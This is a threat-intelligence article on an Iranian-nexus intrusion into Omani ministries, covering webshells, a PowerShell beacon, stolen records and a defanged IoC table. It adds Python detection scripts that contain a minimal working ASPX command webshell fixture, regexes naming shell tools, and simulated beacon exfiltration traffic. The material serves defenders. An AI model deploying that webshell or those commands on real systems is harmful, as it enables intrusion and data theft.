Iranian-Nexus Targets Oman Ministries: Webshells & Data
A sophisticated cyber operation, attributed to an Iranian-nexus threat actor, has infiltrated at least 12 Omani government ministries. This stealthy campaign has resulted in the theft of tens of thousands of citizen records and established persistent backdoors within the compromised systems.
The intrusion came to light when a staging server at 172.86.76[.]127, hosted on a VPS in the United Arab Emirates, was found with its directory wide open.
The entire toolkit, command and control code, session logs, and stolen data were all visible. The primary confirmed target was the Ministry of Justice and Legal Affairs, showing signs of active compromise as recently as April 10, 2026.
Analysts at Hunt.io identified the exposed server and documented the full scope of the operation, including the tools used, targets hit, and data stolen.
Their research points to a campaign consistent with Iranian state-sponsored activity, with overlaps seen in past operations linked to Iran’s Ministry of Intelligence and Security.
Oman has been targeted by Iranian-aligned hackers before. In 2025, a separate group compromised a mailbox at Oman’s Ministry of Foreign Affairs and used it to send phishing emails to embassies globally.
This latest campaign follows a similar direction, with a sharper focus on judicial records, immigration data, and citizen identity information.
Over 26,000 Ministry of Justice user records were pulled from the environment, along with judicial case data, committee decisions, and Windows registry hives containing internal credentials. A README file on the server labeled the machine as “VPS C2,” suggesting it was just one node within a larger, still-unidentified infrastructure.
Webshells, SQL Escalation, and a Wide Target Scope
Two webshells were central to this attack. The first, hc2.aspx, was recovered directly from the C2 server. The second, health_check_t.aspx, appeared hardcoded across every attack script targeting the Ministry of Justice network.
Commands were passed in a single request parameter, executed through a Windows command process, and the output was returned to the attacker as plain text.
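The webshell behaviour just described (a known ASPX filename, a command carried in one request parameter, execution through cmd.exe, plain-text output back to the caller) is exactly the shape a defender can hunt for. The following is an added example, not Hunt.io's or HackersRadar's code: it checks IIS W3C log lines for hits on the two reported filenames and for shell commands in query strings, and scores ASPX source for the traits of that pattern. The log lines, the sample ASPX page, the parameter name `c` and the client address 203.0.113.7 are constructed for illustration.

```python
"""Hunt for the ASPX webshell pattern: known filename, command in a request parameter,
execution via cmd.exe, plain-text output. Added example; all sample data is constructed."""
import re
from urllib.parse import unquote

# Webshell filenames reported on the page; extend with your own hunting list.
KNOWN_WEBSHELLS = {"hc2.aspx", "health_check_t.aspx"}
# Tokens that have no business in a query string sent to an ASPX page.
SHELL_TOKENS = re.compile(r"(?i)\b(cmd(\.exe)?|powershell|whoami|net\s+user|ipconfig|tasklist|certutil)\b")

# Constructed IIS W3C log excerpt (default field set; IIS keeps the query URL-encoded).
IIS_LOG = """\
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status
2026-04-10 03:00:02 10.1.2.5 GET /owa/ - 443 - 10.1.9.20 Mozilla/5.0 200
2026-04-10 03:00:09 10.1.2.5 GET /aspnet_client/health_check_t.aspx c=whoami 443 - 203.0.113.7 python-requests/2.31 200
2026-04-10 03:00:41 10.1.2.5 POST /aspnet_client/health_check_t.aspx - 443 - 203.0.113.7 python-requests/2.31 200
2026-04-10 03:01:15 10.1.2.5 GET /ecp/health.aspx - 443 - 10.1.9.21 Mozilla/5.0 200
2026-04-10 03:02:30 10.1.2.5 GET /owa/auth/errorFE.aspx x=cmd.exe%20/c%20net%20user 443 - 203.0.113.7 curl/8.0 200
"""

def parse_iis(text):
    """Parse W3C extended-format lines using the #Fields header that IIS writes."""
    fields, rows = None, []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            rows.append(dict(zip(fields, line.split())))
    return rows

def hunt_iis_log(text):
    """Return (reason, client_ip, uri, detail) for requests that hit a known webshell
    filename or carry a shell command inside the query string of an ASPX page."""
    findings = []
    for r in parse_iis(text):
        stem = r["cs-uri-stem"].lower()
        query = "" if r["cs-uri-query"] == "-" else unquote(r["cs-uri-query"])
        if stem.rsplit("/", 1)[-1] in KNOWN_WEBSHELLS:
            findings.append(("known-webshell-name", r["c-ip"], stem, query or r["cs-method"]))
        elif stem.endswith(".aspx") and SHELL_TOKENS.search(query):
            findings.append(("shell-command-in-query", r["c-ip"], stem, query))
    return findings

# Source-level traits of the "parameter -> cmd.exe -> Response.Write" webshell shape.
WEBSHELL_SOURCE_RULES = {
    "process-start": re.compile(r"Process\.Start|ProcessStartInfo", re.I),
    "cmd-interpreter": re.compile(r'"cmd(\.exe)?"|/c\s', re.I),
    "request-param": re.compile(r"Request(\.QueryString|\.Form|\.Params)?\s*\[", re.I),
}

def score_aspx_source(src):
    """Return the traits an ASPX page exhibits; all three together is the pattern above."""
    return sorted(name for name, rx in WEBSHELL_SOURCE_RULES.items() if rx.search(src))

# Constructed minimal page showing the described behaviour; a fixture for the rules only.
SAMPLE_ASPX = r'''<%@ Page Language="C#" %><%
var psi = new System.Diagnostics.ProcessStartInfo("cmd.exe", "/c " + Request["c"]);
psi.RedirectStandardOutput = true; psi.UseShellExecute = false;
Response.Write(System.Diagnostics.Process.Start(psi).StandardOutput.ReadToEnd());
%>'''

if __name__ == "__main__":
    for finding in hunt_iis_log(IIS_LOG):
        print(finding)
    print(score_aspx_source(SAMPLE_ASPX))
```

Run it against real IIS logs by swapping `IIS_LOG` for the file contents; the filename check catches the reported shells, while the query heuristic and the source scoring catch renamed copies, which matters because the attacker here used two different names for the same capability.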
A dedicated folder on the server held 12 exploit scripts built for Omani government targets, covering Exchange email spraying, SQL server escalation, and memory-based execution designed to avoid writing files to disk.
The 12 targeted entities included the Royal Oman Police, Tax Authority, Civil Aviation Authority, Ministry of Finance, and the Office of Public Prosecution. Techniques ranged from ProxyShell exploitation to credential brute-forcing. The attacker also deployed GodPotato, a Windows privilege escalation tool, once inside the network.
Command Infrastructure and Iranian Nexus Ties
The C2 system ran on a Python HTTP server paired with a PowerShell beacon installed on the victim machine. The beacon checked in every 30 seconds, returning the victim’s domain, username, and hostname at the start of each session.
Stolen data was sent back in small encoded chunks to avoid triggering URL length limits. Logs confirm the active session on April 10, 2026 began at 03:00 UTC, with all traffic traced to the Ministry of Justice network.
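The two traits described above, a fixed 30-second check-in and data leaving in many small encoded query-string chunks, are both visible in outbound proxy logs. The following is an added example, not Hunt.io's or HackersRadar's code and not the beacon's real wire format: it flags (source, destination) pairs with near-constant request timing, aggregates encoded query values per parameter so that tiny per-request transfers add up, and reassembles the chunks when the proxy logs full URLs. The log layout, the `id`/`d` parameter names, the addresses and the exfiltrated bytes are constructed.

```python
"""Beacon and chunked-exfil detection over outbound proxy logs. Added example; the log
format, parameter names, addresses and payload are constructed, not the real beacon's."""
import base64
import hashlib
import math
import statistics
from collections import Counter, defaultdict
from datetime import datetime, timedelta, timezone
from urllib.parse import parse_qsl, quote, urlsplit

# Stand-in for a binary artefact such as a registry hive (deterministic pseudo-random bytes).
SAMPLE_HIVE = b"".join(hashlib.sha256(bytes([i])).digest() for i in range(20))
CHUNK = 48  # base64 characters per request, small enough to stay under URL length limits

def make_sample_log():
    """Constructed proxy log, one 'timestamp src dst method url' per line: a beacon pair
    checking in every 30 s (+/- 1 s jitter) carrying data chunks, plus irregular browsing."""
    t0 = datetime(2026, 4, 10, 3, 0, 0, tzinfo=timezone.utc)
    b64 = base64.urlsafe_b64encode(SAMPLE_HIVE).decode()
    chunks = [b64[i:i + CHUNK] for i in range(0, len(b64), CHUNK)]
    lines = []
    for i in range(24):
        ts = t0 + timedelta(seconds=30 * i + (i % 3) - 1)
        q = "id=" + quote("MOJ\\jdoe@WS-0421", safe="")  # domain\user@host, as the page describes
        if i < len(chunks):
            q += "&d=" + chunks[i]
        lines.append(f"{ts.isoformat()} 10.1.9.20 203.0.113.7 GET http://203.0.113.7:8080/api/status?{q}")
    for s in (0, 7, 95, 140, 143, 380, 600, 601):
        ts = t0 + timedelta(seconds=s)
        lines.append(f"{ts.isoformat()} 10.1.9.21 198.51.100.10 GET https://198.51.100.10/news?page={s % 5}")
    return "\n".join(lines)

def parse_proxy_log(text):
    rows = []
    for line in text.splitlines():
        ts, src, dst, method, url = line.split()
        rows.append({"ts": datetime.fromisoformat(ts), "src": src, "dst": dst, "method": method, "url": url})
    return rows

def beacon_candidates(rows, min_hits=5, max_cv=0.1):
    """Flag (src, dst) pairs whose inter-request gaps are nearly constant. A coefficient of
    variation (stdev/mean) under max_cv is machine timing, not a person clicking."""
    by_pair = defaultdict(list)
    for r in rows:
        by_pair[(r["src"], r["dst"])].append(r["ts"])
    found = []
    for (src, dst), times in by_pair.items():
        if len(times) < min_hits:
            continue
        times.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        mean = statistics.mean(gaps)
        cv = statistics.pstdev(gaps) / mean if mean else float("inf")
        if cv <= max_cv:
            found.append({"src": src, "dst": dst, "hits": len(times),
                          "period_s": round(mean, 1), "jitter_cv": round(cv, 3)})
    return found

def shannon(s):
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values())

def looks_encoded(value, min_len=16, min_entropy=4.0):
    """base64 or urlsafe-base64 alphabet, long enough, high entropy (thresholds are assumptions)."""
    body = value.rstrip("=")
    return (len(body) >= min_len and all(ch.isalnum() or ch in "+/-_" for ch in body)
            and shannon(body) >= min_entropy)

def exfil_chunks(rows, min_chunks=3):
    """(src, dst, param) -> count of encoded chunks and total encoded characters.
    Each request is tiny; only the per-parameter aggregate reveals the transfer."""
    per = defaultdict(list)
    for r in rows:
        for k, v in parse_qsl(urlsplit(r["url"]).query, keep_blank_values=True):
            if looks_encoded(v):
                per[(r["src"], r["dst"], k)].append(len(v))
    return {k: {"chunks": len(v), "encoded_chars": sum(v)} for k, v in per.items() if len(v) >= min_chunks}

def reassemble(rows, src, dst, param):
    """Join chunk values in time order and decode; only possible when the proxy logs full URLs."""
    ordered = sorted((r for r in rows if r["src"] == src and r["dst"] == dst), key=lambda r: r["ts"])
    parts = [v for r in ordered for k, v in parse_qsl(urlsplit(r["url"]).query) if k == param]
    return base64.urlsafe_b64decode("".join(parts))

if __name__ == "__main__":
    rows = parse_proxy_log(make_sample_log())
    print(beacon_candidates(rows))
    print(exfil_chunks(rows))
    print(reassemble(rows, "10.1.9.20", "203.0.113.7", "d") == SAMPLE_HIVE)
```

The timing check needs only timestamps and endpoints, so it works on NetFlow or firewall logs as well; the chunk aggregation and reassembly need full URLs, which is a good argument for keeping query strings in proxy logs rather than truncating them.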

A neighboring cluster of domains on the same hosting network included a replica of a Persian-language diaspora media site and pages tied to censorship circumvention tools, patterns linked to Iranian state operations in the past.
Tooling overlaps with known Iranian-nexus groups APT34 and MuddyWater, both of which have targeted Middle Eastern governments using similar methods. Hunt.io stopped short of formal group attribution but placed the activity within the broader Iranian state-nexus space.
Monitoring exposed infrastructure in the window between attacker setup and cleanup remains one of the most practical ways to catch an active intrusion before critical data walks out the door.
IoCs:
| IP Address | Resolving Domain(s) | Hosting Provider |
|---|---|---|
| 172.86.76[.]101 | dubai-1.vaermb[.]com, regorixa[.]com | RouterHosting LLC, UAE |
| 172.86.76[.]94 | dubai-2.vaermb[.]com | RouterHosting LLC, UAE |
| 172.86.76[.]108 | dubai-3.vaermb[.]com, myjitsi.exceptionnotfound[.]ir | RouterHosting LLC, UAE |
| 172.86.76[.]112 | dubai-4.vaermb[.]com, s5.sideliner[.]ir | RouterHosting LLC, UAE |
| 172.86.76[.]120 | dubai-5.vaermb[.]com | RouterHosting LLC, UAE |
| 172.86.76[.]121 | dubai-6.vaermb[.]com | RouterHosting LLC, UAE |
| 172.86.76[.]124 | dubai-7.vaermb[.]com, suanefllix[.]com, brnettlix[.]com, brttfrixx[.]com, realprimefix[.]com, identificara[.]com | RouterHosting LLC, UAE |
| 172.86.76[.]127 | dubai-10.vaermb[.]com | RouterHosting LLC, UAE |
| 172.86.76[.]129 | dubai-8.vaermb[.]com | RouterHosting LLC, UAE |
| 172.86.76[.]130 | dubai-9.vaermb[.]com | RouterHosting LLC, UAE |
| 45.59.114[.]60 | shop.exceptionnotfound[.]ir, price.exceptionnotfound[.]ir, myjitsi.mrnajafipour[.]ir | RouterHosting LLC, CH |
| 104.21.27[.]95 | tools.exceptionnotfound[.]ir | Cloudflare |
| 172.67.142[.]35 | tools.exceptionnotfound[.]ir | Cloudflare |
Note: IP addresses and domains are intentionally defanged (e.g., [.]) to prevent accidental resolution or hyperlinking. Re-fang only within controlled threat intelligence platforms such as MISP, VirusTotal, or your SIEM.
Disclaimer: HackersRadar reports on cybersecurity threats and incidents for informational and awareness purposes only. We do not engage in hacking activities, data exfiltration, or the hosting or distribution of stolen or leaked information. All content is based on publicly available sources.